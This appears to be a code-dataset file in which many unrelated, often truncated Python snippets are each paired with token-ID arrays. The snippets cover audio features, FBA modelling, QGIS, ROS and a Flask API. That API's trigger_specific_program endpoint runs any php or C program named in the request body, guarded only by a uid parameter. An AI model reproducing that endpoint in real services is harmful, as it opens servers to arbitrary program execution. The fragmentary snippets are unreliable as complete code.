start_char = r'\%s' % chr(cp[0])
else:
start_char = chr(cp[0])
end_cp = cp[1] - 1 # Character ranges include the right bound
if end_cp in CHARACTER_CLASS_ESCAPED:
end_char = r'\%s' % chr(end_cp)
else:
end_char = chr(end_cp)
if end_cp > cp[0] + 1:
return '%s-%s' % (start_char, end_char)
else:
return start_char + end_char
| [
2,
198,
2,
15069,
357,
66,
828,
1584,
12,
42334,
11,
311,
1797,
4090,
357,
24274,
3961,
329,
13435,
10422,
737,
198,
2,
1439,
2489,
10395,
13,
198,
2,
770,
2393,
318,
9387,
739,
262,
2846,
286,
262,
17168,
13789,
13,
198,
2,
4091,... | 2.319069 | 1,589 |
import argparse
import torch
from torch.utils.data import DataLoader
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../"))
from deep_audio_features.dataloading.dataloading import FeatureExtractorDataset
from deep_audio_features.lib.training import test
from deep_audio_features.utils.model_editing import drop_layers
from deep_audio_features.bin.basic_test import test_model
import deep_audio_features.bin.config
import os
import glob
import numpy as np
import pickle
if __name__ == '__main__':
# Read arguments
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model_dir', required=True,
type=str, help='Dir of models')
parser.add_argument('-i', '--input', required=True,
type=str, help='Input file for testing')
args = parser.parse_args()
model_dir = args.model_dir
ifile = args.input
compile_deep_database(ifile, model_dir, "db")
| [
11748,
1822,
29572,
198,
11748,
28034,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
17401,
198,
11748,
25064,
11,
28686,
198,
17597,
13,
6978,
13,
28463,
7,
15,
11,
28686,
13,
6978,
13,
22179,
7,
198,
220,
220,
220,
28686,
13,
... | 2.696721 | 366 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__ = 'Chao Wu'
R = 8.315e-3 # gas constant in kJ/mol/K
T = 298.15 # absolute temperature in K, or 25 C
K = 10000 # big enough constant
defaultMW = 40 # default enzyme molecular weight in kDa
defaultKcat = 200 # default reaction catalytic rate constant in 1/s
defaultKm = 0.2 # default reactant Michaelis constant in mM
maxIter = 100000
import re
import numpy as np
from pyomo.environ import (ConcreteModel, Set, Param, Var, Objective, Constraint, SolverFactory,
NonNegativeReals, Binary, value, maximize, minimize, log, exp)
from .result import FBAResults, TFBAResults, ETFBAResults
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
628,
198,
834,
9800,
834,
796,
705,
1925,
5488,
18027,
6,
628,
198,
198,
49,
796,
807,
13,
27936,
68,
12,
18,
197,
197,
2,
... | 2.794239 | 243 |
import numpy as np
from keras import backend as K
from keras.models import Sequential
from keras.layers import Dense, Bidirectional, LSTM, GRU
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.layers import Conv1D, MaxPooling1D
from time import time
import pandas as pd
# convert an array of values into a dataset matrix
| [
11748,
299,
32152,
355,
45941,
198,
6738,
41927,
292,
1330,
30203,
355,
509,
198,
6738,
41927,
292,
13,
27530,
1330,
24604,
1843,
198,
6738,
41927,
292,
13,
75,
6962,
1330,
360,
1072,
11,
43484,
4154,
282,
11,
406,
2257,
44,
11,
10863... | 3.428571 | 105 |
# -- python --
import cv2,tqdm,copy
import numpy as np
import unittest
import tempfile
import sys
from einops import rearrange
import shutil
from pathlib import Path
from easydict import EasyDict as edict
# -- vision --
from PIL import Image
# -- linalg --
import torch as th
import numpy as np
# -- package helper imports --
from faiss.contrib import kn3
from faiss.contrib import testing
# -- check if reordered --
from scipy import optimize
SAVE_DIR = Path("./output/tests/")
#
#
# -- Primary Testing Class --
#
#
PYTEST_OUTPUT = Path("./pytests/output/")
#
# -- Load Data --
#
#
# -- [Exec] Sim Search --
#
| [
198,
2,
1377,
21015,
1377,
198,
11748,
269,
85,
17,
11,
83,
80,
36020,
11,
30073,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
11748,
20218,
7753,
198,
11748,
25064,
198,
6738,
304,
259,
2840,
1330,
37825,
858,
... | 2.780172 | 232 |
from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| [
6738,
9485,
48,
83,
19,
1330,
33734,
8205,
72,
198,
13344,
62,
9900,
796,
31051,
14259,
528,
541,
14,
34,
14079,
14490,
14,
52,
73,
9226,
14,
10002,
82,
14,
28781,
62,
6390,
62,
3312,
62,
83,
974,
13,
13344,
14,
28781,
62,
6390,
... | 2.268116 | 828 |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
| [
2,
15069,
12131,
43208,
21852,
1766,
1539,
12052,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198... | 3.415698 | 344 |
from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
| [
6738,
686,
17744,
2306,
346,
13,
22602,
1330,
2393,
22602,
198,
7252,
62,
40148,
62,
259,
62,
2875,
796,
14631,
1847,
32,
2430,
34,
16309,
2430,
1921,
47,
2430,
8763,
52,
2430,
11909,
36,
2430,
8763,
56,
2430,
39,
1797,
2430,
41119,
... | 2.368421 | 76 |
from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
# Reconhece um depot localizado na rampa
# Faz o cache da localização dos depots de rampa
| [
6738,
629,
17,
13,
9979,
1187,
1330,
1635,
201,
198,
6738,
629,
17,
13,
9150,
1330,
6252,
17,
201,
198,
201,
198,
6738,
10214,
13,
301,
5117,
622,
12303,
701,
13,
25781,
62,
20500,
1330,
15906,
12837,
201,
198,
6738,
764,
25781,
133... | 2.895833 | 96 |
from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
main()
| [
6738,
4808,
35,
1404,
1404,
48232,
1546,
1330,
12200,
19667,
198,
2,
24361,
25,
11259,
257,
45755,
11140,
12200,
357,
33,
2257,
828,
10385,
340,
284,
257,
18169,
12200,
884,
326,
790,
1994,
286,
262,
2656,
44992,
318,
3421,
284,
262,
... | 4.061947 | 113 |
#!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33272,
9608,
355,
33272,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
2015,
66,
18,
67,
13,
411,
75,
... | 2.351064 | 564 |
from .base import BaseJITTest
| [
6738,
764,
8692,
1330,
7308,
41,
2043,
14402,
628
] | 3.444444 | 9 |
e = Exgdb()
c = ExgdbCmd()
#c.b('atcoder_abc_abc124_d_handstand::main')
c.b('main.rs:82')
gdb.execute('run')
gdb.execute('layout src')
| [
68,
796,
1475,
70,
9945,
3419,
198,
66,
796,
1475,
70,
9945,
40109,
3419,
198,
2,
66,
13,
65,
10786,
265,
66,
12342,
62,
39305,
62,
39305,
17464,
62,
67,
62,
4993,
1481,
3712,
12417,
11537,
198,
66,
13,
65,
10786,
12417,
13,
3808,... | 2.076923 | 65 |
#!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-07-08 13:19
@author: a002028
"""
class Dependencies:
"""Doc."""
def __init__(self, **kwargs):
"""Initiate."""
# TODO: what to do here?
# maybe it´s enough with the dependencies
# listed in DEV_dependencies.yaml ?
pass
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
15069,
357,
66,
8,
33160,
9447,
25374,
11,
14023,
25582,
2770,
290,
15084,
3225,
30766,
5136,
13,
198,
2,
13789,
25,
17168,
13789,
357,
3826,
38559,
24290,
13,
14116,
393,
2638,
137... | 2.551351 | 185 |
# -*- coding: utf-8 -*-
#########################################################
#
# who when what
# -------- ---------- ---------------------------------
# apuglisi 2019-09-28 Created
#
#########################################################
def multiton(cls):
'''
Multiton decorator
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
All parameters must be able to be passed to str() in order
to build an hashable key.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
def multiton_id(cls):
'''
Multiton decorator for mutable types
Decorator that returns the same instance of a class
every time it is instantiated with the same parameters.
Similar to "multiton", but uses the id of each argument
to build an hashable key. This allows to pass things
like dictionaries that will be recognized as identical even
if their contents change, but risks not recognizing identical
values of strings and numbers.
As a side effect, the class name becomes a function
that returns an instance, rather than a class type instance.
'''
instances = {}
return getinstance
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
14468,
7804,
2,
198,
2,
198,
2,
508,
220,
220,
220,
220,
220,
220,
618,
220,
220,
220,
220,
220,
220,
220,
644,
198,
2,
24200,
220,
24200,
438,
220,
20368,
... | 3.515707 | 382 |
from heritagesites.models import CountryArea, DevStatus, HeritageSite, HeritageSiteCategory, \
HeritageSiteJurisdiction, Location, Planet, Region, SubRegion, IntermediateRegion
from rest_framework import response, serializers, status
| [
6738,
607,
270,
1095,
2737,
13,
27530,
1330,
12946,
30547,
11,
6245,
19580,
11,
18518,
29123,
11,
18518,
29123,
27313,
11,
3467,
198,
197,
9360,
10208,
29123,
41,
333,
9409,
2867,
11,
13397,
11,
11397,
11,
17718,
11,
3834,
47371,
11,
... | 4.016393 | 61 |
#!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
if __name__ == '__main__':
rospy.init_node('wp_depth_action_planner')
planner = WPDepthPlanner(rospy.get_name())
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
2,
15069,
2864,
399,
4487,
45409,
11,
20872,
71,
945,
3099,
347,
5183,
357,
46803,
382,
31,
74,
400,
13,
325,
11,
38487,
65,
5183,
31,
74,
400,
13,
325,
8,
198,
2,
198,
2,
2297,
... | 3.470219 | 638 |
'''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
current_hour, add_hour = list(map(int, input().split()))
contest_hour = current_hour + add_hour
if contest_hour < 24:
print(contest_hour)
else:
print(contest_hour - 24)
| [
7061,
6,
15414,
201,
198,
1954,
362,
201,
198,
16,
201,
198,
201,
198,
24,
1105,
201,
198,
2481,
201,
198,
201,
198,
7061,
6,
201,
198,
201,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
201,
198,
2,... | 2.053254 | 169 |
'''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
| [
7061,
6,
198,
198,
15056,
257,
362,
67,
10706,
3975,
286,
705,
16,
338,
357,
1044,
8,
290,
705,
15,
338,
357,
7050,
828,
954,
262,
1271,
286,
14807,
13,
1052,
7022,
318,
11191,
416,
1660,
290,
318,
7042,
416,
14320,
15909,
8604,
3... | 2.890511 | 137 |
# -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
"""
自定义redis列表增量迭代
:param name: redis中的name,即:迭代name对应的列表
:return: yield 返回 列表元素
"""
list_count = r.llen(name)
for index in range(list_count):
yield r.lindex(name, index)
#}}}
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
# }}}
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
# }}}
#=======================================================
# 提供使用者生成下載檔案列表之id & pwd (gen_salt)
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案功能之id & pwd合法性
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案的有效期限若超過則刪除
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
#}}}
#=======================================================
# 提供api觸發指定程式
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
    # Run a php (or C) program on the host, either synchronously (capturing
    # its output) or fire-and-forget via a worker thread / celery task.
    # Callable both as a Flask endpoint (selfUse=False) and directly from
    # other server code (selfUse=True, parameters passed as kwargs).
    # NOTE(review): indentation of this function was reconstructed from a
    # whitespace-mangled source; confirm block boundaries against the original.
    #{{{APIINFO
    '''
    {
        "API_application":"提供觸發指定程式",
        "API_parameters":{"uid":"使用者帳號"},
        "API_path_parameters":{"SYSTEM":"合法的系統名稱"},
        "API_postData":{
            "bodytype":"Object",
            "bodyschema":"{}",
            "parameters":{
                "languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
                "programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
                "programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
            },
            "precautions":{
                "注意事項1":"languages目前只接受php語言",
                "注意事項2":"programName程式路徑必須存在"
            },
            "example":[
                {
                    "languages":"php",
                    "programName":"test.php",
                    "programData":"123"
                }
            ]
        },
        "API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
        "API_example":{
            "Response": "ok",
            "APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
            "OperationTime": "3.020",
            "BytesTransferred": 223,
            "System": "IOT",
            "GetProgramResponse": "test"
        }
    }
    '''
    #}}}
    err_msg = "error"
    # Supported language -> interpreter binary ("c" entries are executed
    # directly, see the cmd.pop(0) below).
    languages_config = {
        "php":"/usr/bin/php",
        "c":""
    }
    if not selfUse:
        # HTTP entry: validate the request and pull parameters from the JSON body.
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        # if SYSTEM not in list(set(globalvar.SYSTEMLIST[globalvar.SERVERIP]).intersection(set(ACCESS_SYSTEM_LIST))):
        # dicRet["Response"] = "system:{} has no privillege to use this API".format(SYSTEM)
        # return jsonify( **dicRet)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
        if not VerifyDataStrLawyer(request.data).verify_json():
            dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
            return jsonify( **dicRet)
        reqdataDict = json.loads(request.data)
        # Some clients double-encode the body; decode a second time if the
        # first loads() produced a string instead of a dict.
        if isinstance(reqdataDict,type(u"")):
            reqdataDict = json.loads(reqdataDict)
        post_parameter = ["languages","programName","programData"]
        if not check_post_parameter_exist(reqdataDict,post_parameter):
            dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
            return jsonify( **dicRet)
        languages = reqdataDict.get("languages")
        programName = reqdataDict.get("programName")
        programData = reqdataDict.get("programData")
        # print "~~~~languages~~~~"
        # print languages
        if languages not in languages_config.keys():
            dicRet["Response"] = "Currently only php and C programs can be executed"
            return jsonify( **dicRet)
    # print "~~~~programName~~~~"
    # print programName
    # print "~~~~programData~~~~"
    # print programData
    # print type(programData)
    # Serialize dict payloads so they can be passed as a single argv token.
    if isinstance(programData,dict): programData = json.dumps(programData)
    # print "~~~~programData~~~~"
    # print programData
    if not os.path.isfile(programName):
        # Target program path does not exist (user-facing message, verbatim).
        # NOTE(review): dicRet is only bound when selfUse is False — confirm
        # internal callers always pass an existing programName.
        dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
        return jsonify( **dicRet)
    # Build argv as a list (no shell involved downstream).
    cmd = [languages_config[languages],programName]
    if programData: cmd.append(programData)
    # cmd = "{}{}".format(languages_config[languages],programName)
    # if programData: cmd+=" '{}'".format(programData)
    # print "~~~cmd~~~"
    # print cmd
    try:
        if useThread:
            # Fire-and-forget: do not wait for the program's output.
            # print "~~~~~trigger start~~~~~~"
            # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            if Temp:
                # Hand the job off to celery (high-priority queue).
                from celeryApp.celeryTasks import celery_trigger_specific_program
                celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
            else:
                # Run in a background worker thread within this process.
                worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
                worker.start()
            # print "~~~~~trigger over~~~~~~"
            # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            err_msg = "ok"
            return
        else:
            # Synchronous path: run the program now and capture its result.
            # For "c" the interpreter slot is empty, so drop it from argv.
            if languages == "c": cmd.pop(0)
            # print "!!!!!!!!!!!!!!!!!"
            dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
            # print "~~~~process~~~~"
            # print process
            # print "~~~~type process~~~~"
            # print type(process)
            dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            # print "!!!!!!!!!!!!!!!!!"
            if process[0]:
                # Success: process[1] holds the program's output.
                dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
                err_msg = "ok"
            else:
                # Failure: process[2] carries error details; drop the raw cmd
                # before returning it to the caller.
                # print process[2]
                del process[2]["cmd"]
                dicRet["GetProgramResponse"] = process[2]
                err_msg = "error"
    except Exception as e:
        # Python 2 print statements: dump the failure to stdout.
        print "~~~Exception~~~"
        print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
        print e
        print sys.exc_info()
    finally:
        if not selfUse:
            # NOTE(review): returning from `finally` suppresses any in-flight
            # exception and overrides earlier returns; confirm intentional.
            # dicRet["THISTIME"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            dicRet["Response"] = err_msg
            return jsonify(**dicRet)
#=======================================================
# Definition: For IoT 初始化IoT所需的redis mes_device_status keys(hash) from mysql table:
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
    """
    For IoT: initialize the redis device keys (hashes) required by IoT,
    mirroring the mysql `preload` table into redis.

    Args:
        SYSTEM: name of the system to use
        selfUse: True when invoked internally (skips request validation and
                 returns nothing); False when serving the Flask route.
    Returns:
        Flask JSON response when selfUse is False; otherwise no return value.
    """
    # NOTE(review): indentation reconstructed from a whitespace-mangled
    # source; confirm block boundaries against the original.
    if not selfUse:
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
    all_device = {}
    err_msg = "error"
    # Phase 1: read the `preload` table and build the desired key -> hash map.
    try:
        DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
        if DbSession is None:
            return
        sess = DbSession()
        queryTable = Table("preload" , metadata, autoload=True)
        for row in sess.query(queryTable).all():
            drow = AdjustDataFormat().format(row._asdict())
            # Desired redis key is "<main_key>_<combine_key>"; its hash fields
            # come from the JSON-encoded combine_list column.
            all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
        err_msg = "ok" #done successfully
        # http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
    except Exception as e:
        err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
    finally:
        # Always release DB resources, then bail out early on failure.
        if 'DbSession' in locals().keys() and DbSession is not None:
            sess.close()
            DbSession.remove()
            engine.dispose()
        if err_msg != "ok":
            if selfUse: return
            if not selfUse:
                dicRet["Response"] = err_msg
                return jsonify( **dicRet)
    err_msg = "error"
    # Phase 2: reconcile redis with the desired state computed above.
    try:
        redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
        dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
        if dbRedis is None:
            return
        for key,value in all_device.items():
            # If the key does not exist yet, create it directly.
            if not dbRedis.exists(key):
                dbRedis.hmset(key, value)
            # If it exists, diff the hash fields and only touch the mismatches.
            else:
                # Set difference: stale fields present in redis but not in the
                # desired value — delete them.
                fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
                if fields_need_del: dbRedis.hdel(key, *fields_need_del)
                # Set difference: new fields in the desired value but missing
                # from redis — add them.
                fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
                if fields_need_add:
                    for value_key,value_value in value.items():
                        if value_key in fields_need_add:
                            dbRedis.hset(key, value_key, value_value)
